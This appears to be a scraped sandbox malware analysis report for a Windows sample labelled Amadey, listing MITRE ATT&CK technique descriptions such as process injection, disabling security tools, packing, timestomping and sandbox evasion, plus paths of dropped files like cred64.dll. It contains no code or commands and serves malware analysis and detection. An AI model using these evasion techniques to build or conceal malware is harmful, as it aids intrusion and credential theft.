Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Amadey

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nika.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\afCf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll

C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll

C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll

\Device\ConDrv

Windows Analysis Report
file.exe

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre